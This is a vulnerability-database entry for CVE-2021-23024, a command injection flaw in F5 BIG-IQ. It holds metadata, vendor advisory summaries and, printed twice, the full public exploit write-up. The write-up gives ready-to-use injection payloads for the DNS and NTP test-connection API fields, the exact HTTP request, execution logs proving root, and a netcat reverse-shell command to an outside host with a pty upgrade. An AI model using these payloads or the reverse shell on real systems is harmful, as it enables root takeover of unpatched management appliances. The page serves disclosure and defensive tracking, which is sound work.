Description
On version 8.0.x before 8.0.0.1, and all 6.x and 7.x versions, the BIG-IQ Configuration utility has an authenticated remote command execution vulnerability in undisclosed pages. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.
Related
{"id": "CVE-2021-23024", "vendorId": null, "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-23024", "description": "On version 8.0.x before 8.0.0.1, and all 6.x and 7.x versions, the BIG-IQ Configuration utility has an authenticated remote command execution vulnerability in undisclosed pages. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.", "published": "2021-06-10T15:15:00", "modified": "2021-09-20T13:50:00", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 9.0}, "severity": "HIGH", "exploitabilityScore": 8.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 7.2, "baseSeverity": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-23024", "reporter": "f5sirt@f5.com", "references": ["https://support.f5.com/csp/article/K06024431", "http://packetstormsecurity.com/files/163264/F5-BIG-IQ-VE-8.0.0-2923215-Remote-Root.html"], "cvelist": ["CVE-2021-23024"], "immutableFields": [], "lastseen": "2022-03-23T14:27:36", "viewCount": 44, "enchantments": {"dependencies": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2021-0719"]}, {"type": "f5", "idList": ["F5:K06024431"]}, {"type": 
"packetstorm", "idList": ["PACKETSTORM:163264"]}, {"type": "zdt", "idList": ["1337DAY-ID-36468"]}], "rev": 4}, "score": {"value": 4.4, "vector": "NONE"}, "twitter": {"counter": 2, "modified": "2021-06-24T07:43:23", "tweets": [{"link": "https://twitter.com/GrupoICA_Ciber/status/1407973120888262658", "text": "F5\nM\u00faltiples vulnerabilidades de severidad alta en productos F5: \n\nCVE-2021-23022,CVE-2021-23024\n\nM\u00e1s info en: https://t.co/30EN1suctc?amp=1\n/hashtag/ciberseguridad?src=hashtag_click /hashtag/grupoica?src=hashtag_click /hashtag/f5?src=hashtag_click"}, {"link": "https://twitter.com/GrupoICA_Ciber/status/1407973120888262658", "text": "F5\nM\u00faltiples vulnerabilidades de severidad alta en productos F5: \n\nCVE-2021-23022,CVE-2021-23024\n\nM\u00e1s info en: https://t.co/30EN1suctc?amp=1\n/hashtag/ciberseguridad?src=hashtag_click /hashtag/grupoica?src=hashtag_click /hashtag/f5?src=hashtag_click"}]}, "backreferences": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2021-0719"]}, {"type": "f5", "idList": ["F5:K06024431"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:163264"]}, {"type": "zdt", "idList": ["1337DAY-ID-36468"]}]}, "exploitation": null, "vulnersScore": 4.4}, "_state": {"dependencies": 0}, "_internal": {}, "cna_cvss": {"cna": null, "cvss": {}}, "cpe": ["cpe:/a:f5:big-iq_centralized_management:7.1.0", "cpe:/a:f5:big-iq_centralized_management:6.1.0"], "cpe23": ["cpe:2.3:a:f5:big-iq_centralized_management:6.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-iq_centralized_management:7.1.0:*:*:*:*:*:*:*"], "cwe": ["NVD-CWE-noinfo"], "affectedSoftware": [{"cpeName": "f5:big-iq_centralized_management", "version": "6.1.0", "operator": "le", "name": "f5 big-iq centralized management"}, {"cpeName": "f5:big-iq_centralized_management", "version": "7.1.0", "operator": "le", "name": "f5 big-iq centralized management"}, {"cpeName": "f5:big-iq_centralized_management", "version": "8.0.0.1", "operator": "lt", "name": "f5 big-iq centralized 
management"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:f5:big-iq_centralized_management:6.1.0:*:*:*:*:*:*:*", "versionStartIncluding": "6.0.0", "versionEndIncluding": "6.1.0", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:f5:big-iq_centralized_management:7.1.0:*:*:*:*:*:*:*", "versionStartIncluding": "7.0.0", "versionEndIncluding": "7.1.0", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:f5:big-iq_centralized_management:8.0.0.1:*:*:*:*:*:*:*", "versionStartIncluding": "8.0.0", "versionEndExcluding": "8.0.0.1", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://support.f5.com/csp/article/K06024431", "name": "https://support.f5.com/csp/article/K06024431", "refsource": "MISC", "tags": ["Vendor Advisory"]}, {"url": "http://packetstormsecurity.com/files/163264/F5-BIG-IQ-VE-8.0.0-2923215-Remote-Root.html", "name": "http://packetstormsecurity.com/files/163264/F5-BIG-IQ-VE-8.0.0-2923215-Remote-Root.html", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}]}
{"checkpoint_advisories": [{"lastseen": "2022-02-16T19:32:41", "description": "A command injection vulnerability exists in F5 BIG-IQ. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary commands on the affected system.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-29T00:00:00", "type": "checkpoint_advisories", "title": "F5 BIG-IQ Command Injection (CVE-2021-23024)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-23024"], "modified": "2021-09-29T00:00:00", "id": "CPAI-2021-0719", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2021-06-23T16:06:18", "description": "", "cvss3": {}, "published": "2021-06-23T00:00:00", "type": "packetstorm", "title": "F5 BIG-IQ VE 8.0.0-2923215 Remote Root", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-23024"], "modified": "2021-06-23T00:00:00", "id": "PACKETSTORM:163264", "href": "https://packetstormsecurity.com/files/163264/F5-BIG-IQ-VE-8.0.0-2923215-Remote-Root.html", "sourceData": "`F5 BIG-IQ VE v8.0.0-2923215 Post-auth Remote 
Root RCE \n \nCVE-2021-23024 \n \n======= \nDetails \n======= \n \nIt was possible to execute commands with root privileges as an authenticated privileged user via command injection in easy-setup-test-connection. \n \nThere are two blind command injection bugs in Test DNS Connection and Test NTP Connection features, which make request to mgmt/shared/system/easy-setup-test-connection. \n \nUser accounts tested for calling the API: \n \n- Admin \n- User + Administrator Role \n \nSSH is enabled by default for the root user, but the system does not intend the admin account to gain a shell access: \n \nadmin:x:0:500:Admin User:/home/admin:/bin/false \n \nBut an admin (or a user with admin-like privileges) can elevate privileges to root and gain a shell via command injection in the web portal. \n \n===== \nRepro \n===== \n \nhttps://bigiq/ui/system/this-device/dns-ntp/dns-ntp-edit \n \nModify and replay back the dnsServerAddresses JSON field. \n \n======= \nRequest \n======= \n \nPUT /mgmt/shared/system/easy-setup-test-connection HTTP/1.1 \nX-F5-Auth-Token: eyJraW..... \n..... \n \n{\"dnsServerAddresses\":[\"$(id>/tmp/id)\"],\"ntpServerAddresses\":[]} \n \nor \n \n{\"dnsServerAddresses\":[\"8.8.8.8\"],\"ntpServerAddresses\":[\"$(whoami)\"]} \n \n======== \nResponse \n======== \n \nHTTP/1.1 400 Bad Request \nServer: webd \n..... 
\n \n{\"code\":400,\"message\":\"Dns $(id>/tmp/id) is not valid\\n\",\"originalRequestBody\":\"{\\\"dnsServerAddresses\\\":[\\\"$(id>/tmp/id)\\\"],\\\"ntpServerAddresses\\\":[]}\",\"referer\":\"https://bigiq/ui/system/this-device/dns-ntp/dns-ntp-edit\",\"restOperationId\":2101063,\"errorStack\":[],\"kind\":\":resterrorresponse\"} \n \nand respectively \n \n{\"code\":400,\"message\":\"NTP $(whoami) is not valid\\n\",\"originalRequestBody\":\"{\\\"dnsServerAddresses\\\":[\\\"8.8.8.8\\\"],\\\"ntpServerAddresses\\\":[\\\"$(whoami)\\\"]}\",\"referer\":\"https://bigiq/ui/system/this-device/dns-ntp/dns-ntp-edit\",\"restOperationId\":2149253,\"errorStack\":[],\"kind\":\":resterrorresponse\"} \n \n============= \nExecution Log \n============= \n \nDNS: \n \npid=7349 executed [/bin/sh -c dig +short +time=5 +tries=1 @$(id>/tmp/id) ] \npid=7351 executed [id ] \npid=7349 executed [dig +short +time=5 +tries=1 @ ] \n \n[root@big:ModuleNotLicensed::LICENSE INOPERATIVE:Standalone] config # cat /tmp/id \nuid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0 \n \nNTP: \n \npid=1288 executed [/bin/sh -c dig +short +time=5 +tries=1 @8.8.8.8 $(whoami) ] \npid=1290 executed [whoami ] \npid=1288 executed [dig +short +time=5 +tries=1 @8.8.8.8 root ] \n \n============ \nExploitation \n============ \n \nThe netcat binary with -e support is installed on the system already making a remote shell easy for demo. \n \nA command such as this will provide the connection to our client listener: \"nc 10.0.0.100 5000 -e /bin/bash\" while on the client we will drop into a root shell on the bigiq server. \n \n$ nc -l -p 5000 \n... 
connection received \n \npython -c 'import pty; pty.spawn(\"/bin/bash\")' \n \n[@big:ModuleNotLicensed::LICENSE INOPERATIVE:Standalone] restjavad # pwd \n \n/var/service/restjavad \n \n[@big:ModuleNotLicensed::LICENSE INOPERATIVE:Standalone] restjavad # id \n \nuid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0 \n \n[@big:ModuleNotLicensed::LICENSE INOPERATIVE:Standalone] restjavad # ps \n..... \n32320 ? S 0:00 su elasticsearch -s /bin/bash -c export JAVA_HOME=/usr/lib/jvm/jre-1.8.0-openjdk.x86_64;export ES_JAVA_OPTS='-Xms6000m -Xmx6000m';export ES_PATH_CONF=/var/config/rest/elasticsearch/config;exec bin/elasticsearch >/dev/null 2>&1 \n32335 tty1 S 0:00 python -c import pty; pty.spawn(\"/bin/bash\") \n32336 pts/0 Ss 0:00 /bin/bash \n \n=== \nFix \n=== \n \nhttps://support.f5.com/csp/article/K06024431 \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/163264/f5bigiq8002923215-exec.txt", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdt": [{"lastseen": "2021-12-20T01:16:20", "description": "", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-06-23T00:00:00", "type": "zdt", "title": "F5 BIG-IQ VE 8.0.0-2923215 Remote Root Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", 
"accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-23024"], "modified": "2021-06-23T00:00:00", "id": "1337DAY-ID-36468", "href": "https://0day.today/exploit/description/36468", "sourceData": "F5 BIG-IQ VE v8.0.0-2923215 Post-auth Remote Root RCE\n\nCVE-2021-23024\n\n=======\nDetails\n=======\n\nIt was possible to execute commands with root privileges as an authenticated privileged user via command injection in easy-setup-test-connection.\n\nThere are two blind command injection bugs in Test DNS Connection and Test NTP Connection features, which make request to mgmt/shared/system/easy-setup-test-connection.\n\nUser accounts tested for calling the API:\n\n- Admin\n- User + Administrator Role\n\nSSH is enabled by default for the root user, but the system does not intend the admin account to gain a shell access:\n\nadmin:x:0:500:Admin User:/home/admin:/bin/false\n\nBut an admin (or a user with admin-like privileges) can elevate privileges to root and gain a shell via command injection in the web portal.\n\n=====\nRepro\n=====\n\nhttps://bigiq/ui/system/this-device/dns-ntp/dns-ntp-edit\n\nModify and replay back the dnsServerAddresses JSON field.\n\n=======\nRequest\n=======\n\nPUT /mgmt/shared/system/easy-setup-test-connection HTTP/1.1\nX-F5-Auth-Token: eyJraW.....\n.....\n\n{\"dnsServerAddresses\":[\"$(id>/tmp/id)\"],\"ntpServerAddresses\":[]}\n\nor\n\n{\"dnsServerAddresses\":[\"8.8.8.8\"],\"ntpServerAddresses\":[\"$(whoami)\"]}\n\n========\nResponse\n========\n\nHTTP/1.1 400 Bad Request\nServer: webd\n.....\n\n{\"code\":400,\"message\":\"Dns $(id>/tmp/id) is not valid\\n\",\"originalRequestBody\":\"{\\\"dnsServerAddresses\\\":[\\\"$(id>/tmp/id)\\\"],\\\"ntpServerAddresses\\\":[]}\",\"referer\":\"https://bigiq/ui/system/this-device/dns-ntp/dns-ntp-edit\",\"restOperationId\":2101063,\"errorStack\":[],\"kind\":\":resterrorresponse\"}\n\nand 
respectively\n\n{\"code\":400,\"message\":\"NTP $(whoami) is not valid\\n\",\"originalRequestBody\":\"{\\\"dnsServerAddresses\\\":[\\\"8.8.8.8\\\"],\\\"ntpServerAddresses\\\":[\\\"$(whoami)\\\"]}\",\"referer\":\"https://bigiq/ui/system/this-device/dns-ntp/dns-ntp-edit\",\"restOperationId\":2149253,\"errorStack\":[],\"kind\":\":resterrorresponse\"}\n\n=============\nExecution Log\n=============\n\nDNS:\n\npid=7349 executed [/bin/sh -c dig +short +time=5 +tries=1 @$(id>/tmp/id) ]\npid=7351 executed [id ]\npid=7349 executed [dig +short +time=5 +tries=1 @ ]\n\n[root@big:ModuleNotLicensed::LICENSE INOPERATIVE:Standalone] config # cat /tmp/id\nuid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0\n\nNTP:\n\npid=1288 executed [/bin/sh -c dig +short +time=5 +tries=1 @8.8.8.8 $(whoami) ]\npid=1290 executed [whoami ]\npid=1288 executed [dig +short +time=5 +tries=1 @8.8.8.8 root ]\n\n============\nExploitation\n============\n\nThe netcat binary with -e support is installed on the system already making a remote shell easy for demo.\n\nA command such as this will provide the connection to our client listener: \"nc 10.0.0.100 5000 -e /bin/bash\" while on the client we will drop into a root shell on the bigiq server.\n\n$ nc -l -p 5000\n... connection received\n\npython -c 'import pty; pty.spawn(\"/bin/bash\")'\n\n[@big:ModuleNotLicensed::LICENSE INOPERATIVE:Standalone] restjavad # pwd\n\n/var/service/restjavad\n\n[@big:ModuleNotLicensed::LICENSE INOPERATIVE:Standalone] restjavad # id\n\nuid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0\n\n[@big:ModuleNotLicensed::LICENSE INOPERATIVE:Standalone] restjavad # ps\n.....\n32320 ? 
S 0:00 su elasticsearch -s /bin/bash -c export JAVA_HOME=/usr/lib/jvm/jre-1.8.0-openjdk.x86_64;export ES_JAVA_OPTS='-Xms6000m -Xmx6000m';export ES_PATH_CONF=/var/config/rest/elasticsearch/config;exec bin/elasticsearch >/dev/null 2>&1\n32335 tty1 S 0:00 python -c import pty; pty.spawn(\"/bin/bash\")\n32336 pts/0 Ss 0:00 /bin/bash\n\n===\nFix\n===\n\nhttps://support.f5.com/csp/article/K06024431\n", "sourceHref": "https://0day.today/exploit/36468", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "f5": [{"lastseen": "2022-04-27T03:33:03", "description": "The BIG-IQ Configuration utility has an authenticated remote command execution vulnerability in undisclosed pages. ([CVE-2021-23024](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23024>))\n\nImpact\n\nThis vulnerability allows an authenticated admin user or a user account assigned with an administrator role and no shell access to execute arbitrary system commands as a root user.\n", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-01T20:21:00", "type": "f5", "title": "BIG-IQ vulnerability CVE-2021-23024", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2021-23024"], "modified": "2022-04-27T02:58:00", "id": "F5:K06024431", "href": "https://support.f5.com/csp/article/K06024431", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}]}